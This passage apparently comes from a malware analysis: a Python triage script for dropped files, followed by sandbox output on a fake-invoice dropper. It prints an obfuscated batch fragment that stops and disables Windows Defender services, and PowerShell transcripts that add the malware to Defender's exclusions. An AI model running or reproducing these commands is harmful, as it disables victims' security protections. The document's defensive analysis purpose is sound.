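# Benign system names droppers reuse for camouflage (assumed watch-list).
SYSTEM_NAMES = {"svchost.exe", "explorer.exe", "lsass.exe", "csrss.exe",
                "winlogon.exe", "dllhost.exe", "rundll32.exe"}

SAMPLE_MD5 = "a656f522f604872e02daee9dbc458d9c"   # from the report header

# Constructed from the records on this page; field names are this script's.
RECORDS = [
    {"path": "C:\\Users\\Public\\Documents\\FaSHxnwjRFVyhBDRxvFVzLZ\\svchost.exe",
     "process": "C:\\Users\\user\\Desktop\\CN-Invoice-XXXXX9808-19011143287990.exe",
     "md5": "A656F522F604872E02DAEE9DBC458D9C"},
    {"path": "C:\\Users\\Public\\Documents\\FaSHxnwjRFVyhBDRxvFVzLZ\\svchost.exe:Zone.Identifier",
     "process": "C:\\Users\\user\\Desktop\\CN-Invoice-XXXXX9808-19011143287990.exe",
     "md5": "187F488E27DB4AF347237FE461A079AD",
     # Reconstructed from the 26-byte preview "[ZoneTransfer]....ZoneId=0".
     "content": "[ZoneTransfer]\r\nZoneId=0\r\n"},
    {"path": "C:\\Users\\user\\AppData\\Local\\Temp\\1481353f-436c-4b98-9136-3fbe69a7e8b4\\AdvancedRun.exe",
     "process": "C:\\Users\\user\\Desktop\\CN-Invoice-XXXXX9808-19011143287990.exe",
     "md5": "17FC12902F4769AF3A9271EB4E2DACCE"},
    {"path": "C:\\ProgramData\\Microsoft\\Windows\\WER\\Temp\\WERCCD7.tmp.dmp",
     "process": "C:\\Windows\\SysWOW64\\WerFault.exe",
     "md5": "DE308525DA996CED860E957C437A02B3"},
]


def parse_zone_identifier(text):
    """Parse the INI-style Zone.Identifier stream; return (zone_id, name)."""
    m = re.search(r"^\s*ZoneId\s*=\s*(\d+)\s*$", text, re.M | re.I)
    if not m:
        return None, "unknown"
    zid = int(m.group(1))
    return zid, ZONE_NAMES.get(zid, "unknown")


def is_system_name_outside_system_dir(path):
    """True when a protected system binary name lives outside its real home."""
    low = path.lower()
    return ntpath.basename(low) in SYSTEM_NAMES and not low.startswith(SYSTEM_DIRS)


def triage(records, sample_md5):
    """Return (path, finding) pairs for every dropped-file record that trips a check."""
    findings = []
    for rec in records:
        path = rec["path"]
        if is_system_name_outside_system_dir(path):
            findings.append((path, "system binary name outside System32/SysWOW64"))
        if rec.get("md5", "").lower() == sample_md5.lower():
            findings.append((path, "byte-identical copy of the submitted sample"))
        if path.lower().endswith(":zone.identifier") and "content" in rec:
            zid, name = parse_zone_identifier(rec["content"])
            # Anything below URLZONE_INTERNET (3) means SmartScreen/MotW prompts are skipped.
            if zid is not None and zid < 3:
                findings.append((path, f"Zone.Identifier ZoneId={zid} ({name}): MotW suppressed"))
    return findings


if __name__ == "__main__":
    for path, finding in triage(RECORDS, SAMPLE_MD5):
        print(f"{finding}\n    {path}")
```

Run against the constructed records, the script flags the svchost.exe drop twice (masquerading name and self-copy) and the Zone.Identifier stream once; the AdvancedRun.exe and WER dump records pass all three checks, which is the expected result since neither reuses a system name, matches the sample hash, or is an ADS.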

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):14734
Entropy (8bit):4.993014478972177
Encrypted:false
SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
MD5:8D5E194411E038C060288366D6766D3D
SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
Malicious:false
Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):22260
Entropy (8bit):5.601283657543269
Encrypted:false
SSDEEP:384:qtCDLC0LZiSouJ0UCiJ3ISBKnOul6o827Y9glSJUeR61BMrmYZSRV7kb6BDc264c:xMSog7Y4KOulP8ilXextAQb6pc
MD5:90158536358DDD647ED0BB31C903AFBB
SHA1:E8BDE2F6DB92DAC14E9AF7F408800D0089F4B8A5
SHA-256:A17A093DA8B5074DA5F3A77C9092F799D78DB31218A2125BA88E36F537D9B838
SHA-512:A3C2DA2F645A1AB4C1F004A900CF89C6F1366018433D0EB89B465F0363E548DD466353049C233329A66937DCBBB6BCD37A89C612AD968C1EB460784E9EA2EF86
Malicious:false
Preview: @...e...........v...........P.B.'.....~.:............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe
                                                                                                                                                            Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):91000
                                                                                                                                                            Entropy (8bit):6.241345766746317
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                                                            MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                            SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                                                            SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                                                            SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                            • Filename: PurchaseOrdersCSTtyres004786587.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 3zKVfxhs18.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: AWB783079370872.docm, Detection: malicious, Browse
                                                                                                                                                            • Filename: DETALLE DE TRANSFERENCIA BANCO AGRARO DE COLOMBIA.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: CN-Invoice-XXXXX9808-19011143287990.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: Payment Advice 170221.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: Payment Receipt.jar, Detection: malicious, Browse
                                                                                                                                                            • Filename: miner.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 875666665.xlsm.xlsm, Detection: malicious, Browse
                                                                                                                                                            • Filename: DOCX.doc.doc, Detection: malicious, Browse
                                                                                                                                                            • Filename: v.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: uaa.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: r.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: j.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 99.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: m.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: n.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: DdV1LG7bLJ.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: TBN HMX SPECS.xlsm, Detection: malicious, Browse
                                                                                                                                                            • Filename: VESSEL CONTACT DETAILS, LOAD & DISPORT.doc, Detection: malicious, Browse
C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat
Process: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: modified
Size (bytes): 8399
Entropy (8bit): 4.665734428420432
Encrypted: false
SSDEEP: 192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
MD5: B2A5EF7D334BDF866113C6F4F9036AAE
SHA1: F9027F2827B35840487EFD04E818121B5A8541E0
SHA-256: 27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
SHA-512: 8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
Malicious: false
Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\AdvancedRun.exe
Process: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 91000
Entropy (8bit): 6.241345766746317
Encrypted: false
SSDEEP: 1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
MD5: 17FC12902F4769AF3A9271EB4E2DACCE
SHA1: 9A4A1581CC3971579574F837E110F3BD6D529DAB
SHA-256: 29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
SHA-512: 036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\test.bat
Process: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 8399
Entropy (8bit): 4.665734428420432
Encrypted: false
SSDEEP: 192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
MD5: B2A5EF7D334BDF866113C6F4F9036AAE
SHA1: F9027F2827B35840487EFD04E818121B5A8541E0
SHA-256: 27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
SHA-512: 8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
Malicious: false
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gccbelfa.ghx.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2nvm502.qyi.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkti2vm4.tb4.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sw14s2mf.ya1.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe
Process: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 91000
Entropy (8bit): 6.241345766746317
Encrypted: false
SSDEEP: 1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
MD5: 17FC12902F4769AF3A9271EB4E2DACCE
SHA1: 9A4A1581CC3971579574F837E110F3BD6D529DAB
SHA-256: 29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
SHA-512: 036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat
Process: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 8399
Entropy (8bit): 4.665734428420432
Encrypted: false
SSDEEP: 192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
MD5: B2A5EF7D334BDF866113C6F4F9036AAE
SHA1: F9027F2827B35840487EFD04E818121B5A8541E0
SHA-256: 27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
SHA-512: 8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
Malicious: false
                                                                                                                                                            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):232
                                                                                                                                                            Entropy (8bit):7.024371743172393
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                                                                                                                                                            MD5:32D0AAE13696FF7F8AF33B2D22451028
                                                                                                                                                            SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                                                                                                                                                            SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                                                                                                                                                            SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.
                                                                                                                                                            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8
                                                                                                                                                            Entropy (8bit):2.75
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:KlC:KlC
                                                                                                                                                            MD5:204A8C77A1EDD9D15835E0795675E4C0
                                                                                                                                                            SHA1:9CDB9CE62C195B5E2C3AFE4EB31530F6BB872ABC
                                                                                                                                                            SHA-256:290483F25B571CCD06B717B23E0C8A27E760D549E30AECD2297973B845590AD4
                                                                                                                                                            SHA-512:97A1E46E222A40B394B053E599D48CA50AF1DF97E3D124DD03538D12B636FFA0A796DCF1F8DC313C4AFB207EB1A583347D683C92B56DC879F3299F76CF4D8ACC
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview: ....H..H
                                                                                                                                                            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):327432
                                                                                                                                                            Entropy (8bit):7.99938831605763
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                                                                                                                                                            MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                                                                                                                                                            SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                                                                                                                                                            SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                                                                                                                                                            SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                                                                                                                                                            C:\Users\user\Documents\20210222\PowerShell_transcript.138727.gLFcjFHw.20210222074542.txt
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1602
                                                                                                                                                            Entropy (8bit):5.3871208811732245
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:BZfv/EoO+SmFvqDYB1ZNm3Z6v/EoO+SmFvqDYB1ZA:BZ3/EN0VqDo1Zc3Zm/EN0VqDo1ZA
                                                                                                                                                            MD5:D214FCFF7A908A665304A0CCFB48FAAE
                                                                                                                                                            SHA1:AB734373D2E75D98767DE27FBEA9DA097DFD9D9C
                                                                                                                                                            SHA-256:654D84F927F7EDACE9D05BAA446FB351B99A0FF2BFF514AAAC6AF0F7CE1D1FE7
                                                                                                                                                            SHA-512:A56F15092553F2012D3C8EBE2B72C06765311AF0C06AA2C05859A7B644F9FBFDE830C6A5071F2D3924367BABCF24969E9ECEF97BBA77D6AB4E5B61B55FD81EF4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210222074612..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe -Force..Process ID: 6496..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210222074612..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210222074930..Username: DES
                                                                                                                                                            C:\Users\user\Documents\20210222\PowerShell_transcript.138727.qwyL+J44.20210222074529.txt
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5887
                                                                                                                                                            Entropy (8bit):5.4334456255694334
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:BZo/ENFqDo1ZFZp/ENFqDo1ZTEq8jZ2/ENFqDo1ZMdMM+Zp:L
                                                                                                                                                            MD5:274E43453E3E88555157553FE6D0202B
                                                                                                                                                            SHA1:DF744448D16DF272AF8857B4A78614518E35B48F
                                                                                                                                                            SHA-256:C457120A2A84A04022230A207CC32A1A900E7373C714A5FB86787FC1532138C7
                                                                                                                                                            SHA-512:4D3B043CAADAEB1F9368239D53DC5AC3857BE0B1DF49F81B3FD29C1A89AB4B0158A99A96C816B1608F066FD327D3FE27F22BC29449F31B142868400B049E0D5B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210222074543..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe -Force..Process ID: 1552..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210222074544..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210222074917..Username: DESKTOP
                                                                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):55
                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Entropy (8bit):5.522318927512162
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                            File name:CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                            File size:206848
                                                                                                                                                            MD5:a656f522f604872e02daee9dbc458d9c
